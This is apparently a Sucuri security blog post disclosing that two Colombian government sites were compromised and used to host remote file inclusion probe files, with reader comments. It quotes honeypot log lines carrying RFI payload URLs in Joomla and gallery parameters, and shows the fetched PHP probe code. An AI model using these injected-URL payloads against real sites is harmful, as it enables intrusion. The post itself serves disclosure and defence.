Colombia Government sites hacked (and spreading malware)

You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, I am joking :) )

That’s not always the case… At Sucuri Security we have two main goals: Monitor your visible Internet presence (via DNS, site content changes, whois, blacklisting status, etc), and to also monitor what is not visible (or easily accessible). So we run multiple honey pots, we monitor IRC chats used by botnets and attackers, multiple forums, etc. All with the goal to protect our clients and notify them if we see any issue in the “underground”.

With this work, we get to see a lot of sites being exploited and attacked. Most of them are small sites, but sometimes we see big companies, .govs and many .edus in there.

One of those government web sites are from Colombia. And they are not a normal .gov site, they are about security and about cyber crimes.

They have two web sites that are currently hacked: http://www.delitosinformaticos.gov.co (related to solving cyber crimes) and
http://www.frentesdeseguridad.gov.co (related to security in general). We tried to contact them and got no replies. We would wait a little more to publish it, but since clem1 mentioned them on our post about Georgia government sites hacked, I think it is time to use full-disclosure to get them fixed.

The first time we saw them was on Dec of last year:

a.b.147.154 – – [22/Dec/2009:15:08:51 -0200] “GET //init_basic.php?GALLERY_BASEDIR=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1″ 404 36 “-” “Mozilla/5.0″
a.b.147.154 – – [22/Dec/2009:15:08:51 -0200] “GET /xxx/init_basic.php?GALLERY_BASEDIR=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1″ 404 36 “-” “Mozilla/5.0″

They were being used in an RFI (remote file inclusion) attack:

$ lynx –source –dump http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

We kept seeing the same attack for a while, with just a few variations (using file id.txt instead of the respon1.txt):

a.b.21.76 – – [27/Jan/2010:09:22:07 -0200] “GET /index.php?option=com_frontpage&Itemid;=&mosConfig.absolute.path;=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt?? HTTP/1.1″ 404 36 “-” “Mozilla/5.0″

That seemed to have stopped on January 28th. Their web sites even went offline, which I hope they were fixing it. However, on February 14th, it started all over:

a.b.147.154 – – [14/Feb/2010:02:49:47 -0200] “GET /xxx//delete_comment.php?board_skin_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1″ 404 36 “-” “Mozilla/5.0″
a.b.147.154 – – [14/Feb/2010:02:49:47 -0200] “GET //delete_comment.php?board_skin_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1″ 404 36 “-” “Mozilla/5.0″

Same RFI attack:

$ lynx –source –dump http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Plus, in addition to be hosting the malware, it is also actively scanning/attacking others (their IP is 200.93.147.154):

200.93.147.154 /xxx///bbs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://xx??
200.93.147.154 /xxx///wedding//index.php?option=com_frontpage&Itemid;=&mosConfig.absolute.path;=yy??

What’s next? Hopefully they will read it and fix the problem.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

  • Anonymous

    no they will not, im pretty shure they even dont know whats going on or just dont care (yeah they dont really care)

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    It is a shame if they don't care… They are still hacked, but hopefully they will wake up.

  • Anonymous

    I have posted that in the Colombia's biggest virtual community. But as everybody says, knowing the colombian goverment they will say they need 2 million dollars to fix that, they will spend that money (obviously it will magically appear in their pockets), and finally won't do anything, as usual.

    http://www.laneros.com/showthread.php?t=169603

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Anonymous: thanks for posting in there. Hopefully this will bring to someones attention…

  • http://www.yaazkal.com Yaazkal

    Hi've told them about this trough they chat. I guess they will take a look.

  • Anonymous

    Wow, I'm colombian, and though I came here because of the GoDaddy incidents, I'm quite surprised these two hack attempts haven't been mentioned anywhere (besides LANeros). While I can't consider myself an expert in security (that's what you are), I don't think we have good (trained, and capable) personnel dealing with security. There are good electronic and telecommunications engineers, but "good" system engineers, NONE.

    By the way, is it Joomla! CMS fault? Any way to avoid future intrusions like this?

    Thanks for your very informative blog.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Anonymous: A bug in Joomla is definitely how they got in, but it is not the CMS fault per se… The system admins probably forgot to patch and monitor their box, so I would probably blame them :)

  • Anonymous

    Or rather they "exposed" their site so they could easily track "wanting-to-do-evil" hackers… in any case, the sites are working again.